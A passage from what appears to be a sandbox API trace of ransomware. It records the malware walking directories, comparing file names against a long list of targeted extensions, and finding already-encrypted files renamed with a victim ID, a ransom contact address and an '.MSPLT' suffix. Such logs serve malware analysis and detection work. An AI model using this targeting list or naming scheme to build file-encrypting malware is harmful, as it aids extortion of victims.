lpString2="MSPLT") returned -1 [0169.228] lstrlenW (lpString=".ppa") returned 4 [0169.228] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0169.228] lstrlenW (lpString=".ppam") returned 5 [0169.228] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0169.228] lstrlenW (lpString=".ppm") returned 4 [0169.228] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0169.228] lstrlenW (lpString=".pps") returned 4 [0169.228] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0169.228] lstrlenW (lpString=".ppsm") returned 5 [0169.228] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0169.229] lstrlenW (lpString=".ppt") returned 4 [0169.229] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".pptm") returned 5 [0169.229] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0169.229] lstrlenW (lpString=".pptx") returned 5 [0169.229] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0169.229] lstrlenW (lpString=".prn") returned 4 [0169.229] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".ps") returned 3 [0169.229] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0169.229] lstrlenW (lpString=".psb") returned 4 [0169.229] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".psd") returned 4 [0169.229] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".pst") returned 4 [0169.229] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".ptx") returned 4 [0169.229] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".pub") returned 4 [0169.229] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".pwm") returned 4 [0169.229] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".pxr") returned 4 [0169.229] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0169.229] lstrlenW (lpString=".py") returned 3 [0169.230] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0169.230] lstrlenW (lpString=".qt") returned 3 [0169.230] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0169.230] lstrlenW (lpString=".r3d") returned 4 [0169.230] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0169.230] lstrlenW (lpString=".raf") returned 4 [0169.230] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0169.230] lstrlenW (lpString=".rar") returned 4 [0169.230] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0169.230] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e396ae, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x130b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0169.230] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.230] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.230] FindClose (in: hFindFile=0x802118 | out: hFindFile=0x802118) returned 1 [0169.231] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.231] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0169.231] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0169.231] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031") returned 26 [0169.231] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8022d8 [0169.231] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.231] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.231] lstrlenW (lpString="eula.rtf") returned 8 [0169.231] lstrlenW (lpString=".1cd") returned 4 [0169.231] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.231] lstrlenW (lpString=".3ds") returned 4 [0169.231] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0169.232] lstrlenW (lpString=".3fr") returned 4 [0169.232] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0169.232] lstrlenW (lpString=".3g2") returned 4 [0169.232] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0169.232] lstrlenW (lpString=".3gp") returned 4 [0169.232] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0169.232] lstrlenW (lpString=".7z") returned 3 [0169.232] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.232] lstrlenW (lpString=".accda") returned 6 [0169.232] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0169.232] lstrlenW (lpString=".accdb") returned 6 [0169.232] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0169.232] lstrlenW (lpString=".accdc") returned 6 [0169.232] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0169.232] lstrlenW (lpString=".accde") returned 6 [0169.232] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0169.232] lstrlenW (lpString=".accdt") returned 6 [0169.232] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0169.232] lstrlenW (lpString=".accdw") returned 6 [0169.232] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0169.232] lstrlenW (lpString=".adb") returned 4 [0169.232] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0169.232] lstrlenW (lpString=".adp") returned 4 [0169.232] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0169.232] lstrlenW (lpString=".ai") returned 3 [0169.232] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0169.232] lstrlenW (lpString=".ai3") returned 4 [0169.232] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".ai4") returned 4 [0169.233] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".ai5") returned 4 [0169.233] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".ai6") returned 4 [0169.233] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".ai7") returned 4 [0169.233] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".ai8") returned 4 [0169.233] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".anim") returned 5 [0169.233] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0169.233] lstrlenW (lpString=".arw") returned 4 [0169.233] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".as") returned 3 [0169.233] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0169.233] lstrlenW (lpString=".asa") returned 4 [0169.233] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".asc") returned 4 [0169.233] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".ascx") returned 5 [0169.233] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0169.233] lstrlenW (lpString=".asm") returned 4 [0169.233] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".asmx") returned 5 [0169.233] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0169.233] lstrlenW (lpString=".asp") returned 4 [0169.233] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0169.233] lstrlenW (lpString=".aspx") returned 5 [0169.234] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0169.234] lstrlenW (lpString=".asr") returned 4 [0169.234] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".asx") returned 4 [0169.234] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".avi") returned 4 [0169.234] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".avs") returned 4 [0169.234] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".backup") returned 7 [0169.234] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0169.234] lstrlenW (lpString=".bak") returned 4 [0169.234] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".bay") returned 4 [0169.234] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".bd") returned 3 [0169.234] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0169.234] lstrlenW (lpString=".bin") returned 4 [0169.234] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".bmp") returned 4 [0169.234] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".bz2") returned 4 [0169.234] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".c") returned 2 [0169.234] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0169.234] lstrlenW (lpString=".cdr") returned 4 [0169.234] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0169.234] lstrlenW (lpString=".cer") returned 4 [0169.235] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".cf") returned 3 [0169.235] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0169.235] lstrlenW (lpString=".cfc") returned 4 [0169.235] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".cfm") returned 4 [0169.235] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".cfml") returned 5 [0169.235] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0169.235] lstrlenW (lpString=".cfu") returned 4 [0169.235] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".chm") returned 4 [0169.235] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".cin") returned 4 [0169.235] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".class") returned 6 [0169.235] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0169.235] lstrlenW (lpString=".clx") returned 4 [0169.235] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".config") returned 7 [0169.235] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0169.235] lstrlenW (lpString=".cpp") returned 4 [0169.235] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".cr2") returned 4 [0169.235] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".crt") returned 4 [0169.235] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0169.235] lstrlenW (lpString=".crw") returned 4 [0169.236] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".cs") returned 3 [0169.236] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0169.236] lstrlenW (lpString=".css") returned 4 [0169.236] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".csv") returned 4 [0169.236] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".cub") returned 4 [0169.236] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".dae") returned 4 [0169.236] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".dat") returned 4 [0169.236] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".db") returned 3 [0169.236] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0169.236] lstrlenW (lpString=".dbf") returned 4 [0169.236] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".dbx") returned 4 [0169.236] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".dc3") returned 4 [0169.236] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".dcm") returned 4 [0169.236] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".dcr") returned 4 [0169.236] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".der") returned 4 [0169.236] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0169.236] lstrlenW (lpString=".dib") returned 4 [0169.237] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".dic") returned 4 [0169.237] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".dif") returned 4 [0169.237] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".divx") returned 5 [0169.237] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0169.237] lstrlenW (lpString=".djvu") returned 5 [0169.237] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0169.237] lstrlenW (lpString=".dng") returned 4 [0169.237] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".doc") returned 4 [0169.237] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".docm") returned 5 [0169.237] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0169.237] lstrlenW (lpString=".docx") returned 5 [0169.237] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.237] lstrlenW (lpString=".dot") returned 4 [0169.237] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".dotm") returned 5 [0169.237] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0169.237] lstrlenW (lpString=".dotx") returned 5 [0169.237] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0169.237] lstrlenW (lpString=".dpx") returned 4 [0169.237] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".dqy") returned 4 [0169.237] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0169.237] lstrlenW (lpString=".dsn") returned 4 [0169.238] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".dt") returned 3 [0169.238] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0169.238] lstrlenW (lpString=".dtd") returned 4 [0169.238] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".dwg") returned 4 [0169.238] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".dwt") returned 4 [0169.238] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".dx") returned 3 [0169.238] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0169.238] lstrlenW (lpString=".dxf") returned 4 [0169.238] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".edml") returned 5 [0169.238] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0169.238] lstrlenW (lpString=".efd") returned 4 [0169.238] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".elf") returned 4 [0169.238] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".emf") returned 4 [0169.238] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".emz") returned 4 [0169.238] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".epf") returned 4 [0169.238] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".eps") returned 4 [0169.238] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0169.238] lstrlenW (lpString=".epsf") returned 5 [0169.239] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0169.239] lstrlenW (lpString=".epsp") returned 5 [0169.239] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0169.239] lstrlenW (lpString=".erf") returned 4 [0169.239] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".exr") returned 4 [0169.239] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".f4v") returned 4 [0169.239] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".fido") returned 5 [0169.239] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0169.239] lstrlenW (lpString=".flm") returned 4 [0169.239] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".flv") returned 4 [0169.239] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".frm") returned 4 [0169.239] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".fxg") returned 4 [0169.239] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".geo") returned 4 [0169.239] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".gif") returned 4 [0169.239] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0169.239] lstrlenW (lpString=".grs") returned 4 [0169.239] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".gz") returned 3 [0169.240] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0169.240] lstrlenW (lpString=".h") returned 2 [0169.240] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0169.240] lstrlenW (lpString=".hdr") returned 4 [0169.240] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".hpp") returned 4 [0169.240] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".hta") returned 4 [0169.240] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".htc") returned 4 [0169.240] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".htm") returned 4 [0169.240] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".html") returned 5 [0169.240] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0169.240] lstrlenW (lpString=".icb") returned 4 [0169.240] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".ics") returned 4 [0169.240] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".iff") returned 4 [0169.240] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".inc") returned 4 [0169.240] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0169.240] lstrlenW (lpString=".indd") returned 5 [0169.240] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0169.240] lstrlenW (lpString=".ini") returned 4 [0169.240] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".iqy") returned 4 [0169.241] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".j2c") returned 4 [0169.241] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".j2k") returned 4 [0169.241] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".java") returned 5 [0169.241] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0169.241] lstrlenW (lpString=".jp2") returned 4 [0169.241] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".jpc") returned 4 [0169.241] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".jpe") returned 4 [0169.241] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".jpeg") returned 5 [0169.241] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0169.241] lstrlenW (lpString=".jpf") returned 4 [0169.241] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".jpg") returned 4 [0169.241] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".jpx") returned 4 [0169.241] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".js") returned 3 [0169.241] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0169.241] lstrlenW (lpString=".jsf") returned 4 [0169.241] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0169.241] lstrlenW (lpString=".json") returned 5 [0169.241] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0169.242] lstrlenW (lpString=".jsp") returned 4 [0169.242] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".kdc") returned 4 [0169.242] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".kmz") returned 4 [0169.242] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".kwm") returned 4 [0169.242] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".lasso") returned 6 [0169.242] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0169.242] lstrlenW (lpString=".lbi") returned 4 [0169.242] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".lgf") returned 4 [0169.242] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".lgp") returned 4 [0169.242] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".log") returned 4 [0169.242] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".m1v") returned 4 [0169.242] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".m4a") returned 4 [0169.242] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".m4v") returned 4 [0169.242] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".max") returned 4 [0169.242] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0169.242] lstrlenW (lpString=".md") returned 3 [0169.243] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0169.243] lstrlenW (lpString=".mda") returned 4 [0169.243] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mdb") returned 4 [0169.243] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mde") returned 4 [0169.243] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mdf") returned 4 [0169.243] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mdw") returned 4 [0169.243] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mef") returned 4 [0169.243] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mft") returned 4 [0169.243] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mfw") returned 4 [0169.243] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mht") returned 4 [0169.243] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mhtml") returned 6 [0169.243] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0169.243] lstrlenW (lpString=".mka") returned 4 [0169.243] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0169.243] lstrlenW (lpString=".mkidx") returned 6 [0169.243] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0169.243] lstrlenW (lpString=".mkv") returned 4 [0169.243] lstrcmpiW 